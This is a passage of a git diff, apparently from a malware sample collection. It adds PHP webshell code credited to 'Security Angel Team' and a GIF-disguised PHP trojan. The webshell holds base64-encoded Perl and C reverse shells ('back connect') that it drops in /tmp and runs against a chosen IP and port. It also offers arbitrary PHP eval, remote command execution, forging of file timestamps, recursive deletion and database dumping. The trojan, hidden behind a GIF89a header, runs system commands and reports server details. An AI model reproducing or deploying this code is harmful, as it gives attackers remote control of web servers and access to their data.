    "); + fr($query); + } + } + } + tbfoot(); + @mysql_close(); +}//end sql backup + + +elseif ($action == 'backconnect') { + !$yourip && $yourip = $_SERVER['REMOTE_ADDR']; + !$yourport && $yourport = '12345'; + $usedb = array('perl'=>'perl','c'=>'c'); + + $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". + "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". + "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". + "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". + "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". + "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". + "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; + $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC". + "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb". + "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd". + "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ". + "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC". + "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D". + "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp". + "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; + + if ($start && $yourip && $yourport && $use){ + if ($use == 'perl') { + cf('/tmp/angel_bc',$back_connect); + $res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &"); + } else { + cf('/tmp/angel_bc.c',$back_connect_c); + $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c'); + @unlink('/tmp/angel_bc.c'); + $res = execute("/tmp/angel_bc $yourip $yourport &"); + } + m("Now script try connect to $yourip port $yourport ..."); + } + + formhead(array('title'=>'Back Connect')); + makehide('action','backconnect'); + p('

    '); + p('Your IP:'); + makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip)); + p('Your Port:'); + makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport)); + p('Use:'); + makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use)); + makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt')); + p('

    '); + formfoot(); +}//end sql backup + +elseif ($action == 'eval') { + $phpcode = trim($phpcode); + if($phpcode){ + if (!preg_match('#<\?#si', $phpcode)) { + $phpcode = ""; + } + eval("?".">$phpcode'Eval PHP Code')); + makehide('action','eval'); + maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode)); + p('

    Get plugins

    '); + formfooter(); +}//end eval + +elseif ($action == 'editfile') { + if(file_exists($opfile)) { + $fp=@fopen($opfile,'r'); + $contents=@fread($fp, filesize($opfile)); + @fclose($fp); + $contents=htmlspecialchars($contents); + } + formhead(array('title'=>'Create / Edit File')); + makehide('action','file'); + makehide('dir',$nowpath); + makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1)); + maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents)); + formfooter(); +}//end editfile + +elseif ($action == 'newtime') { + $opfilemtime = @filemtime($opfile); + //$time = strtotime("$year-$month-$day $hour:$minute:$second"); + $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12); + formhead(array('title'=>'Clone file was last modified time')); + makehide('action','file'); + makehide('dir',$nowpath); + makeinput(array('title'=>'Alter file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1)); + makeinput(array('title'=>'Reference file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1)); + formfooter(); + formhead(array('title'=>'Set last modified')); + makehide('action','file'); + makehide('dir',$nowpath); + makeinput(array('title'=>'Current file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1)); + p('

    Instead »'); + p('year:'); + makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4)); + p('month:'); + makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2)); + p('day:'); + makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2)); + p('hour:'); + makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2)); + p('minute:'); + makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2)); + p('second:'); + makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2)); + p('

    '); + formfooter(); +}//end newtime + +elseif ($action == 'shell') { + if (IS_WIN && IS_COM) { + if($program && $parameter) { + $shell= new COM('Shell.Application'); + $a = $shell->ShellExecute($program,$parameter); + m('Program run has '.(!$a ? 'success' : 'fail')); + } + !$program && $program = 'c:\windows\system32\cmd.exe'; + !$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt'; + formhead(array('title'=>'Execute Program')); + makehide('action','shell'); + makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1)); + p('

    '); + makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter)); + makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute')); + p('

    '); + formfoot(); + } + formhead(array('title'=>'Execute Command')); + makehide('action','shell'); + if (IS_WIN && IS_COM) { + $execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open'); + makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1)); + } + p('

    '); + makeinput(array('title'=>'Command','name'=>'command','value'=>$command)); + makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute')); + p('

    '); + formfoot(); + + if ($command) { + p('
    ');
    +		if ($execfunc=='wscript' && IS_WIN && IS_COM) {
    +			$wsh = new COM('WScript.shell');
    +			$exec = $wsh->exec('cmd.exe /c '.$command);
    +			$stdout = $exec->StdOut();
    +			$stroutput = $stdout->ReadAll();
    +			echo $stroutput;
    +		} elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
    +			$descriptorspec = array(
    +			   0 => array('pipe', 'r'),
    +			   1 => array('pipe', 'w'),
    +			   2 => array('pipe', 'w')
    +			);
    +			$process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
    +			if (is_resource($process)) {
    +				fwrite($pipes[0], $command."\r\n");
    +				fwrite($pipes[0], "exit\r\n");
    +				fclose($pipes[0]);
    +				while (!feof($pipes[1])) {
    +					echo fgets($pipes[1], 1024);
    +				}
    +				fclose($pipes[1]);
    +				while (!feof($pipes[2])) {
    +					echo fgets($pipes[2], 1024);
    +				}
    +				fclose($pipes[2]);
    +				proc_close($process);
    +			}
    +		} else {
    +			echo(execute($command));
    +		}
    +		p('
    '); + } +}//end shell + +elseif ($action == 'phpenv') { + $upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed'; + $adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from'); + !$dis_func && $dis_func = 'No'; + $info = array( + 1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)), + 2 => array('Server Domain',$_SERVER['SERVER_NAME']), + 3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])), + 4 => array('Server OS',PHP_OS), + 5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']), + 6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']), + 7 => array('Server Web Port',$_SERVER['SERVER_PORT']), + 8 => array('PHP run mode',strtoupper(php_sapi_name())), + 9 => array('The file path',__FILE__), + + 10 => array('PHP Version',PHP_VERSION), + 11 => array('PHPINFO',(IS_PHPINFO ? 'Yes' : 'No')), + 12 => array('Safe Mode',getcfg('safe_mode')), + 13 => array('Administrator',$adminmail), + 14 => array('allow_url_fopen',getcfg('allow_url_fopen')), + 15 => array('enable_dl',getcfg('enable_dl')), + 16 => array('display_errors',getcfg('display_errors')), + 17 => array('register_globals',getcfg('register_globals')), + 18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')), + 19 => array('memory_limit',getcfg('memory_limit')), + 20 => array('post_max_size',getcfg('post_max_size')), + 21 => array('upload_max_filesize',$upsize), + 22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'), + 23 => array('disable_functions',$dis_func), + ); + + if($phpvarname) { + m($phpvarname .' : '.getcfg($phpvarname)); + } + + formhead(array('title'=>'Server environment')); + makehide('action','phpenv'); + makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1)); + formfooter(); + + $hp = array(0=> 'Server', 1=> 'PHP'); + for($a=0;$a<2;$a++) { + p('

    '.$hp[$a].' »

    '); + p('
      '); + if ($a==0) { + for($i=1;$i<=9;$i++) { + p('
    • '.$info[$i][0].':'.$info[$i][1].'
    • '); + } + } elseif ($a == 1) { + for($i=10;$i<=23;$i++) { + p('
    • '.$info[$i][0].':'.$info[$i][1].'
    • '); + } + } + p('
    '); + } +}//end phpenv + +else { + m('Undefined Action'); +} + +?> + +
    + + Copyright (C) 2004-2008 Security Angel Team [S4T] All Rights Reserved. +
    + + + +'; + echo $msg; + echo '
    '; +} +function scookie($key, $value, $life = 0, $prefix = 1) { + global $admin, $timestamp, $_SERVER; + $key = ($prefix ? $admin['cookiepre'] : '').$key; + $life = $life ? $life : $admin['cookielife']; + $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0; + setcookie($key, $value, $timestamp+$life, $admin['cookiepath'], $admin['cookiedomain'], $useport); +} +function multi($num, $perpage, $curpage, $tablename) { + $multipage = ''; + if($num > $perpage) { + $page = 10; + $offset = 5; + $pages = @ceil($num / $perpage); + if($page > $pages) { + $from = 1; + $to = $pages; + } else { + $from = $curpage - $offset; + $to = $curpage + $page - $offset - 1; + if($from < 1) { + $to = $curpage + 1 - $from; + $from = 1; + if(($to - $from) < $page && ($to - $from) < $pages) { + $to = $page; + } + } elseif($to > $pages) { + $from = $curpage - $pages + $to; + $to = $pages; + if(($to - $from) < $page && ($to - $from) < $pages) { + $from = $pages - $page + 1; + } + } + } + $multipage = ($curpage - $offset > 1 && $pages > $page ? 'First ' : '').($curpage > 1 ? 'Prev ' : ''); + for($i = $from; $i <= $to; $i++) { + $multipage .= $i == $curpage ? $i.' ' : '['.$i.'] '; + } + $multipage .= ($curpage < $pages ? 'Next' : '').($to < $pages ? ' Last' : ''); + $multipage = $multipage ? '

    Pages: '.$multipage.'

    ' : ''; + } + return $multipage; +} +// µÇ½Èë¿Ú +function loginpage() { +?> + + + Password: + + + +Can not connect to MySQL server'); + exit; + } + if($link && $dbname) { + if (!@mysql_select_db($dbname, $link)) { + p('

    Database selected has error

    '); + exit; + } + } + if($link && mysql_get_server_info() > '4.1') { + if(in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) { + q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link); + } + } + return $link; +} + +// È¥µôתÒå×Ö·û +function s_array(&$array) { + if (is_array($array)) { + foreach ($array as $k => $v) { + $array[$k] = s_array($v); + } + } else if (is_string($array)) { + $array = stripslashes($array); + } + return $array; +} + +// Çå³ýHTML´úÂë +function html_clean($content) { + $content = htmlspecialchars($content); + $content = str_replace("\n", "
    ", $content); + $content = str_replace(" ", "  ", $content); + $content = str_replace("\t", "    ", $content); + return $content; +} + +// »ñȡȨÏÞ +function getChmod($filepath){ + return substr(base_convert(@fileperms($filepath),10,8),-4); +} + +function getPerms($filepath) { + $mode = @fileperms($filepath); + if (($mode & 0xC000) === 0xC000) {$type = 's';} + elseif (($mode & 0x4000) === 0x4000) {$type = 'd';} + elseif (($mode & 0xA000) === 0xA000) {$type = 'l';} + elseif (($mode & 0x8000) === 0x8000) {$type = '-';} + elseif (($mode & 0x6000) === 0x6000) {$type = 'b';} + elseif (($mode & 0x2000) === 0x2000) {$type = 'c';} + elseif (($mode & 0x1000) === 0x1000) {$type = 'p';} + else {$type = '?';} + + $owner['read'] = ($mode & 00400) ? 'r' : '-'; + $owner['write'] = ($mode & 00200) ? 'w' : '-'; + $owner['execute'] = ($mode & 00100) ? 'x' : '-'; + $group['read'] = ($mode & 00040) ? 'r' : '-'; + $group['write'] = ($mode & 00020) ? 'w' : '-'; + $group['execute'] = ($mode & 00010) ? 'x' : '-'; + $world['read'] = ($mode & 00004) ? 'r' : '-'; + $world['write'] = ($mode & 00002) ? 'w' : '-'; + $world['execute'] = ($mode & 00001) ? 'x' : '-'; + + if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';} + if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';} + if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';} + + return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute']; +} + +function getUser($filepath) { + if (function_exists('posix_getpwuid')) { + $array = @posix_getpwuid(@fileowner($filepath)); + if ($array && is_array($array)) { + return ' / '.$array['name'].''; + } + } + return ''; +} + +// ɾ³ýĿ¼ +function deltree($deldir) { + $mydir=@dir($deldir); + while($file=$mydir->read()) { + if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) { + @chmod($deldir.'/'.$file,0777); + deltree($deldir.'/'.$file); + } + if (is_file($deldir.'/'.$file)) { + @chmod($deldir.'/'.$file,0777); + @unlink($deldir.'/'.$file); + } + } + $mydir->close(); + @chmod($deldir,0777); + return @rmdir($deldir) ? 1 : 0; +} + +// ±í¸ñÐмäµÄ±³¾°É«Ìæ»» +function bg() { + global $bgc; + return ($bgc++%2==0) ? 'alt1' : 'alt2'; +} + +// »ñÈ¡µ±Ç°µÄÎļþϵͳ·¾¶ +function getPath($scriptpath, $nowpath) { + if ($nowpath == '.') { + $nowpath = $scriptpath; + } + $nowpath = str_replace('\\', '/', $nowpath); + $nowpath = str_replace('//', '/', $nowpath); + if (substr($nowpath, -1) != '/') { + $nowpath = $nowpath.'/'; + } + return $nowpath; +} + +// »ñÈ¡µ±Ç°Ä¿Â¼µÄÉϼ¶Ä¿Â¼ +function getUpPath($nowpath) { + $pathdb = explode('/', $nowpath); + $num = count($pathdb); + if ($num > 2) { + unset($pathdb[$num-1],$pathdb[$num-2]); + } + $uppath = implode('/', $pathdb).'/'; + $uppath = str_replace('//', '/', $uppath); + return $uppath; +} + +// ¼ì²éPHPÅäÖòÎÊý +function getcfg($varname) { + $result = get_cfg_var($varname); + if ($result == 0) { + return 'No'; + } elseif ($result == 1) { + return 'Yes'; + } else { + return $result; + } +} + +// ¼ì²éº¯ÊýÇé¿ö +function getfun($funName) { + return (false !== function_exists($funName)) ? 'Yes' : 'No'; +} + +function GetList($dir){ + global $dirdata,$j,$nowpath; + !$j && $j=1; + if ($dh = opendir($dir)) { + while ($file = readdir($dh)) { + $f=str_replace('//','/',$dir.'/'.$file); + if($file!='.' && $file!='..' && is_dir($f)){ + if (is_writable($f)) { + $dirdata[$j]['filename']=str_replace($nowpath,'',$f); + $dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f)); + $dirdata[$j]['dirchmod']=getChmod($f); + $dirdata[$j]['dirperm']=getPerms($f); + $dirdata[$j]['dirlink']=ue($dir); + $dirdata[$j]['server_link']=$f; + $dirdata[$j]['client_link']=ue($f); + $j++; + } + GetList($f); + } + } + closedir($dh); + clearstatcache(); + return $dirdata; + } else { + return array(); + } +} + +function qy($sql) { + //echo $sql.'
    '; + $res = $error = ''; + if(!$res = @mysql_query($sql)) { + return 0; + } else if(is_resource($res)) { + return 1; + } else { + return 2; + } + return 0; +} + +function q($sql) { + return @mysql_query($sql); +} + +function fr($qy){ + mysql_free_result($qy); +} + +function sizecount($size) { + if($size > 1073741824) { + $size = round($size / 1073741824 * 100) / 100 . ' G'; + } elseif($size > 1048576) { + $size = round($size / 1048576 * 100) / 100 . ' M'; + } elseif($size > 1024) { + $size = round($size / 1024 * 100) / 100 . ' K'; + } else { + $size = $size . ' B'; + } + return $size; +} + +// ѹËõ´ò°üÀà +class PHPZip{ + var $out=''; + function PHPZip($dir) { + if (@function_exists('gzcompress')) { + $curdir = getcwd(); + if (is_array($dir)) $filelist = $dir; + else{ + $filelist=$this -> GetFileList($dir);//ÎļþÁбí + foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1); + } + if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir); + else chdir($curdir); + if (count($filelist)>0){ + foreach($filelist as $filename){ + if (is_file($filename)){ + $fd = fopen ($filename, 'r'); + $content = @fread ($fd, filesize($filename)); + fclose ($fd); + if (is_array($dir)) $filename = basename($filename); + $this -> addFile($content, $filename); + } + } + $this->out = $this -> file(); + chdir($curdir); + } + return 1; + } + else return 0; + } + + // »ñµÃÖ¸¶¨Ä¿Â¼ÎļþÁбí + function GetFileList($dir){ + static $a; + if (is_dir($dir)) { + if ($dh = opendir($dir)) { + while ($file = readdir($dh)) { + if($file!='.' && $file!='..'){ + $f=$dir .'/'. $file; + if(is_dir($f)) $this->GetFileList($f); + $a[]=$f; + } + } + closedir($dh); + } + } + return $a; + } + + var $datasec = array(); + var $ctrl_dir = array(); + var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; + var $old_offset = 0; + + function unix2DosTime($unixtime = 0) { + $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); + if ($timearray['year'] < 1980) { + $timearray['year'] = 1980; + $timearray['mon'] = 1; + $timearray['mday'] = 1; + $timearray['hours'] = 0; + $timearray['minutes'] = 0; + $timearray['seconds'] = 0; + } // end if + return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | + ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); + } + + function addFile($data, $name, $time = 0) { + $name = str_replace('\\', '/', $name); + + $dtime = dechex($this->unix2DosTime($time)); + $hexdtime = '\x' . $dtime[6] . $dtime[7] + . '\x' . $dtime[4] . $dtime[5] + . '\x' . $dtime[2] . $dtime[3] + . '\x' . $dtime[0] . $dtime[1]; + eval('$hexdtime = "' . $hexdtime . '";'); + $fr = "\x50\x4b\x03\x04"; + $fr .= "\x14\x00"; + $fr .= "\x00\x00"; + $fr .= "\x08\x00"; + $fr .= $hexdtime; + + $unc_len = strlen($data); + $crc = crc32($data); + $zdata = gzcompress($data); + $c_len = strlen($zdata); + $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); + $fr .= pack('V', $crc); + $fr .= pack('V', $c_len); + $fr .= pack('V', $unc_len); + $fr .= pack('v', strlen($name)); + $fr .= pack('v', 0); + $fr .= $name; + $fr .= $zdata; + $fr .= pack('V', $crc); + $fr .= pack('V', $c_len); + $fr .= pack('V', $unc_len); + + $this -> datasec[] = $fr; + $new_offset = strlen(implode('', $this->datasec)); + + $cdrec = "\x50\x4b\x01\x02"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x14\x00"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x08\x00"; + $cdrec .= $hexdtime; + $cdrec .= pack('V', $crc); + $cdrec .= pack('V', $c_len); + $cdrec .= pack('V', $unc_len); + $cdrec .= pack('v', strlen($name) ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('V', 32 ); + $cdrec .= pack('V', $this -> old_offset ); + $this -> old_offset = $new_offset; + $cdrec .= $name; + + $this -> ctrl_dir[] = $cdrec; + } + + function file() { + $data = implode('', $this -> datasec); + $ctrldir = implode('', $this -> ctrl_dir); + return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00"; + } +} + +// ±¸·ÝÊý¾Ý¿â +function sqldumptable($table, $fp=0) { + $tabledump = "DROP TABLE IF EXISTS $table;\n"; + $tabledump .= "CREATE TABLE $table (\n"; + + $firstfield=1; + + $fields = q("SHOW FIELDS FROM $table"); + while ($field = mysql_fetch_array($fields)) { + if (!$firstfield) { + $tabledump .= ",\n"; + } else { + $firstfield=0; + } + $tabledump .= " $field[Field] $field[Type]"; + if (!empty($field["Default"])) { + $tabledump .= " DEFAULT '$field[Default]'"; + } + if ($field['Null'] != "YES") { + $tabledump .= " NOT NULL"; + } + if ($field['Extra'] != "") { + $tabledump .= " $field[Extra]"; + } + } + fr($fields); + + $keys = q("SHOW KEYS FROM $table"); + while ($key = mysql_fetch_array($keys)) { + $kname=$key['Key_name']; + if ($kname != "PRIMARY" && $key['Non_unique'] == 0) { + $kname="UNIQUE|$kname"; + } + if(!is_array($index[$kname])) { + $index[$kname] = array(); + } + $index[$kname][] = $key['Column_name']; + } + fr($keys); + + while(list($kname, $columns) = @each($index)) { + $tabledump .= ",\n"; + $colnames=implode($columns,","); + + if ($kname == "PRIMARY") { + $tabledump .= " PRIMARY KEY ($colnames)"; + } else { + if (substr($kname,0,6) == "UNIQUE") { + $kname=substr($kname,7); + } + $tabledump .= " KEY $kname ($colnames)"; + } + } + + $tabledump .= "\n);\n\n"; + if ($fp) { + fwrite($fp,$tabledump); + } else { + echo $tabledump; + } + + $rows = q("SELECT * FROM $table"); + $numfields = mysql_num_fields($rows); + while ($row = mysql_fetch_array($rows)) { + $tabledump = "INSERT INTO $table VALUES("; + + $fieldcounter=-1; + $firstfield=1; + while (++$fieldcounter<$numfields) { + if (!$firstfield) { + $tabledump.=", "; + } else { + $firstfield=0; + } + + if (!isset($row[$fieldcounter])) { + $tabledump .= "NULL"; + } else { + $tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'"; + } + } + + $tabledump .= ");\n"; + + if ($fp) { + fwrite($fp,$tabledump); + } else { + echo $tabledump; + } + } + fr($rows); + if ($fp) { + fwrite($fp,"\n"); + } else { + echo "\n"; + } +} + +function ue($str){ + return urlencode($str); +} + +function p($str){ + echo $str."\n"; +} + +function tbhead() { + p(''); +} +function tbfoot(){ + p('
    '); +} + +function makehide($name,$value=''){ + p(""); +} + +function makeinput($arg = array()){ + $arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\""; + $arg['extra'] = $arg['extra'] ? $arg['extra'] : ''; + !$arg['type'] && $arg['type'] = 'text'; + $arg['title'] = $arg['title'] ? $arg['title'].'
    ' : ''; + $arg['class'] = $arg['class'] ? $arg['class'] : 'input'; + if ($arg['newline']) { + p("

    $arg[title]

    "); + } else { + p("$arg[title]"); + } +} + +function makeselect($arg = array()){ + if ($arg['onchange']) { + $onchange = 'onchange="'.$arg['onchange'].'"'; + } + $arg['title'] = $arg['title'] ? $arg['title'] : ''; + if ($arg['newline']) p('

    '); + p("$arg[title] "); + if ($arg['newline']) p('

    '); +} +function formhead($arg = array()) { + !$arg['method'] && $arg['method'] = 'post'; + !$arg['action'] && $arg['action'] = $self; + $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : ''; + !$arg['name'] && $arg['name'] = 'form1'; + p("
    "); + if ($arg['title']) { + p('

    '.$arg['title'].' »

    '); + } +} + +function maketext($arg = array()){ + !$arg['cols'] && $arg['cols'] = 100; + !$arg['rows'] && $arg['rows'] = 25; + $arg['title'] = $arg['title'] ? $arg['title'].'
    ' : ''; + p("

    $arg[title]

    "); +} + +function formfooter($name = ''){ + !$name && $name = 'submit'; + p('

    '); + p('
    '); +} + +function formfoot(){ + p(''); +} + +// µ÷ÊÔº¯Êý +function pr($a) { + echo '
    ';
    +	print_r($a);
    +	echo '
    '; +} + +?> \ No newline at end of file diff --git a/PHP/Trojan.PHP.Agent.a b/PHP/Trojan.PHP.Agent.a new file mode 100644 index 00000000..5b9ab32a --- /dev/null +++ b/PHP/Trojan.PHP.Agent.a @@ -0,0 +1,58 @@ +GIF89aY? + +?÷?????EUR???EUR?EUREUR???EUREUR?EUR?EUREUREUREUREURÀÀÀ??????????????????????????????????????????????????????????????????????????????????????????????????3??f?????Ì????3??33?3f?3??3Ì?3??f??f3?ff?f??fÌ?f??????3??f?????Ì????Ì??Ì3?Ìf?Ì??ÌÌ?Ì??????3??f?????Ì???3??3?33?f3??3?Ì3??33?33333f33?33Ì33?3f?3f33ff3f?3fÌ3f?3??3?33?f3??3?Ì3??3Ì?3Ì33Ìf3Ì?3ÌÌ3Ì?3??3?33?f3??3?Ì3??f??f?3f?ff??f?Ìf??f3?f33f3ff3?f3Ìf3?ff?ff3fffff?ffÌff?f??f?3f?ff??f?Ìf??fÌ?fÌ3fÌffÌ?fÌÌfÌ?f??f?3f?ff??f?Ìf???????3??f?????Ì????3??33?3f?3??3Ì?3??f??f3?ff?f??fÌ?f??????3??f?????Ì????Ì??Ì3?Ìf?Ì??ÌÌ?Ì??????3??f?????Ì???Ì??Ì?3Ì?fÌ??Ì?ÌÌ??Ì3?Ì33Ì3fÌ3?Ì3ÌÌ3?Ìf?Ìf3ÌffÌf?ÌfÌÌf?Ì??Ì?3Ì?fÌ??Ì?ÌÌ??ÌÌ?ÌÌ3ÌÌfÌÌ?ÌÌÌÌÌ?Ì??Ì?3Ì?fÌ??Ì?ÌÌ???????3??f?????Ì????3??33?3f?3??3Ì?3??f??f3?ff?f??fÌ?f??????3??f?????Ì????Ì??Ì3?Ìf?Ì??ÌÌ?Ì??????3??f?????Ì???,????Y? + +????H° Á?*\È°¡C??J|q¢C?3N¬h'!Ç?; éQdI"Gj4H2cK?U®$Ør&È?,GÒÌ?0dL?>w$)t'Q¢?â?8TiÒ¥PyÕ)Ó&P--.?F?ørhV©NÃj...tkزW?¢¥?Ö)Ç?dÇÂ5 ô¥O---5çF...qm?§gc¢E?²°áÃ?#?; += 4 && $len <=6) + { + return sprintf("%0.2f Kb", $number/1024); + } + if($len >= 7 && $len <=9) + { + return sprintf("%0.2f Mb", $number/1024/1024); + } + + return sprintf("%0.2f Gb", $number/1024/1024/1024); + +} + +echo "bsdcr3w
    "; +$un = @php_uname(); +$up = system(uptime); +$id1 = system(id); +$pwd1 = @getcwd(); +$sof1 = getenv("SERVER_SOFTWARE"); +$php1 = phpversion(); +$name1 = $_SERVER['SERVER_NAME']; +$ip1 = gethostbyname($SERVER_ADDR); +$free1= diskfreespace($pwd1); +$free = ConvertBytes(diskfreespace($pwd1)); +if (!$free) {$free = 0;} +$all1= disk_total_space($pwd1); +$all = ConvertBytes(disk_total_space($pwd1)); +if (!$all) {$all = 0;} +$used = ConvertBytes($all1-$free1); +$os = @PHP_OS; +echo "We was here ... and u no !!!
    "; +echo "uname -a: $un
    "; +echo "os: $os
    "; +echo "uptime: $up
    "; +echo "id: $id1
    "; +echo "pwd: $pwd1
    "; +echo "php: $php1
    "; +echo "software: $sof1
    "; +echo "server-name: $name1
    "; +echo "server-ip: $ip1
    "; +echo "free: $free
    "; +echo "used: $used
    "; +echo "total: $all
